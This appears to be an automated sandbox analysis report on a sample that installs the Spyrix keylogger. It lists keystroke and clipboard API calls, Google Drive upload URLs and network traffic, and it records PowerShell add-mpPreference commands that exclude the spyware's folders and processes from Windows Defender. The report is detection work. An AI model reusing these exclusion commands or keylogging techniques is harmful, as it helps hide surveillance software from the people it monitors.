Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/upload/drive/v2/files/
Source: spkl.exe	String found in binary or memory: https://www.googleapis.com/upload/drive/v2/files?uploadType=resumable
Source: spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/upload/drive/v2/files?uploadType=resumableSV
Source: spkl.exe, 00000033.00000002.3201106110.0000000000915000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2965463976.00000000044CC000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3244401024.000000000457B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.spyrix.com
Source: spkl.exe, 00000033.00000002.3201106110.0000000000915000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2965463976.00000000044CC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.spyrix.com/purchase.php?prg=sfk
Source: spkl.exe, 00000033.00000002.3244401024.000000000457B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.spyrix.com/purchase.php?prg=sfkI
Source: spkl.exe, 00000033.00000002.3247512604.0000000004C18000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.spyrix.come

Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55063 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55019 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55054 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55075
Source: unknown	Network traffic detected: HTTP traffic on port 55028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55074
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55073
Source: unknown	Network traffic detected: HTTP traffic on port 55031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55076
Source: unknown	Network traffic detected: HTTP traffic on port 55066 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55072 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55009
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55007
Source: unknown	Network traffic detected: HTTP traffic on port 55007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55013
Source: unknown	Network traffic detected: HTTP traffic on port 55052 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55049 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 55018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55016
Source: unknown	Network traffic detected: HTTP traffic on port 55060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55015
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55019
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55020
Source: unknown	Network traffic detected: HTTP traffic on port 55032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55024
Source: unknown	Network traffic detected: HTTP traffic on port 55057 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55023
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55022
Source: unknown	Network traffic detected: HTTP traffic on port 55074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55067 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55044 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55028
Source: unknown	Network traffic detected: HTTP traffic on port 55009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55026
Source: unknown	Network traffic detected: HTTP traffic on port 55021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55031
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55030
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55035
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55034
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55033
Source: unknown	Network traffic detected: HTTP traffic on port 55058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55032
Source: unknown	Network traffic detected: HTTP traffic on port 55073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55050 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55041 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55039
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55038
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55037
Source: unknown	Network traffic detected: HTTP traffic on port 55024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55036
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55030 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55042
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55041
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55040
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55046
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55045
Source: unknown	Network traffic detected: HTTP traffic on port 55076 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55044
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55043
Source: unknown	Network traffic detected: HTTP traffic on port 55042 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55049
Source: unknown	Network traffic detected: HTTP traffic on port 55059 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55061 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55048
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55047
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55053
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55052
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55051
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55050
Source: unknown	Network traffic detected: HTTP traffic on port 55033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55057
Source: unknown	Network traffic detected: HTTP traffic on port 55075 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55056
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55054
Source: unknown	Network traffic detected: HTTP traffic on port 55056 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55047 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55064 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55059
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55058
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55064
Source: unknown	Network traffic detected: HTTP traffic on port 55053 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55062
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55061
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55068
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55067
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55066
Source: unknown	Network traffic detected: HTTP traffic on port 55036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55060

Source: unknown	HTTPS traffic detected: 23.109.93.100:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.114.14.170:443 -> 192.168.2.7:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.114.14.168:443 -> 192.168.2.7:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.7:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.7:55007 version: TLS 1.2

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 51_2_033A6312 OpenClipboard,

51_2_033A6312

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 51_2_033A6342 SetClipboardData,

51_2_033A6342

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 51_2_033A6292 GetAsyncKeyState,

51_2_033A6292

Source: spkl.exe, 00000033.00000003.3002861269.0000000006CFD000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_7444ed91-3

Source: C:\Users\user\Desktop\404.exe

Code function: 0_2_09B994D8 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,

0_2_09B994D8

System Summary

PE file has nameless sections

Source: is-A63B5.tmp.13.dr	Static PE information: section name:
Source: is-A63B5.tmp.13.dr	Static PE information: section name:
Source: is-A63B5.tmp.13.dr	Static PE information: section name:
Source: is-A63B5.tmp.13.dr	Static PE information: section name:
Source: is-A63B5.tmp.13.dr	Static PE information: section name:
Source: is-A63B5.tmp.13.dr	Static PE information: section name:
Source: is-A63B5.tmp.13.dr	Static PE information: section name:
Source: is-A63B5.tmp.13.dr	Static PE information: section name:
Source: is-A63B5.tmp.13.dr	Static PE information: section name:
Source: is-A63B5.tmp.13.dr	Static PE information: section name:
Source: is-F1LPA.tmp.13.dr	Static PE information: section name:
Source: is-F1LPA.tmp.13.dr	Static PE information: section name:
Source: is-F1LPA.tmp.13.dr	Static PE information: section name:
Source: is-F1LPA.tmp.13.dr	Static PE information: section name:
Source: is-F1LPA.tmp.13.dr	Static PE information: section name:
Source: is-F1LPA.tmp.13.dr	Static PE information: section name:
Source: is-F1LPA.tmp.13.dr	Static PE information: section name:
Source: is-F1LPA.tmp.13.dr	Static PE information: section name:
Source: is-F1LPA.tmp.13.dr	Static PE information: section name:
Source: is-F1LPA.tmp.13.dr	Static PE information: section name:

Uses regedit.exe to modify the Windows registry

Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp

Process created: C:\Windows\SysWOW64\regedit.exe "regedit.exe" /e "C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.uid" "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1"

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess '404.*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c plist.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess '404.*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c plist.cmd

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 51_2_033A6252 NtdllDefWindowProc_A,

51_2_033A6252

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 51_2_033A5FFA: DeviceIoControl,

51_2_033A5FFA

Source: C:\Users\user\Desktop\404.exe	Code function: 0_2_0242DC34	0_2_0242DC34
Source: C:\Users\user\Desktop\404.exe	Code function: 0_2_09B90040	0_2_09B90040
Source: C:\Users\user\Desktop\404.exe	Code function: 0_2_09B92DF0	0_2_09B92DF0
Source: C:\Users\user\Desktop\404.exe	Code function: 0_2_09B9AFA8	0_2_09B9AFA8
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_008696A9	51_2_008696A9
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_0086957A	51_2_0086957A
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_033C6654	51_2_033C6654
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_033DE88C	51_2_033DE88C
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_033D1D50	51_2_033D1D50
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_033B110C	51_2_033B110C
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_033B0538	51_2_033B0538
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_3_014907A0	65_3_014907A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_3_014907A0	65_3_014907A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_3_014907A0	65_3_014907A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_3_014907A0	65_3_014907A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_3_014907A0	65_3_014907A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_3_014907A0	65_3_014907A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_3_014907A0	65_3_014907A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_3_014907A0	65_3_014907A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_3_014907A0	65_3_014907A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_3_014907A0	65_3_014907A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_3_014907A0	65_3_014907A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_3_014907A0	65_3_014907A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_3_014907A0	65_3_014907A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_3_014907A0	65_3_014907A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_3_014907A0	65_3_014907A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_3_014907A0	65_3_014907A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_3_014907A0	65_3_014907A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_3_014907A0	65_3_014907A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_3_014907A0	65_3_014907A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_3_014907A0	65_3_014907A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_3_014907A0	65_3_014907A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_3_014907A0	65_3_014907A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_3_014907A0	65_3_014907A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_3_014907A0	65_3_014907A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_3_014907A0	65_3_014907A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_2_0024B890	65_2_0024B890
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_2_002420F0	65_2_002420F0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_2_0023A132	65_2_0023A132
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_2_002A0130	65_2_002A0130
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_2_00254170	65_2_00254170
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_2_002AA140	65_2_002AA140
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_2_0023A132	65_2_0023A132
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_2_0028A340	65_2_0028A340
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_2_0025E590	65_2_0025E590
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_2_0025F5D0	65_2_0025F5D0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_2_004B85B0	65_2_004B85B0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_2_00240620	65_2_00240620
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_2_002536A0	65_2_002536A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_2_002866B0	65_2_002866B0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_2_002676C0	65_2_002676C0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_2_0028A7B0	65_2_0028A7B0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_2_002659E0	65_2_002659E0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_2_00249A20	65_2_00249A20
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_2_00262A9D	65_2_00262A9D
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_2_002A8C20	65_2_002A8C20
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_2_00259D10	65_2_00259D10
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_2_0023A132	65_2_0023A132
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_2_00231F10	65_2_00231F10
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_2_00246F90	65_2_00246F90
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_3_029E15F3	71_3_029E15F3
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_3_029E15F3	71_3_029E15F3
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_3_029E15F3	71_3_029E15F3
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_3_029E15F3	71_3_029E15F3
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_3_029E15F3	71_3_029E15F3
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_3_029E15F3	71_3_029E15F3
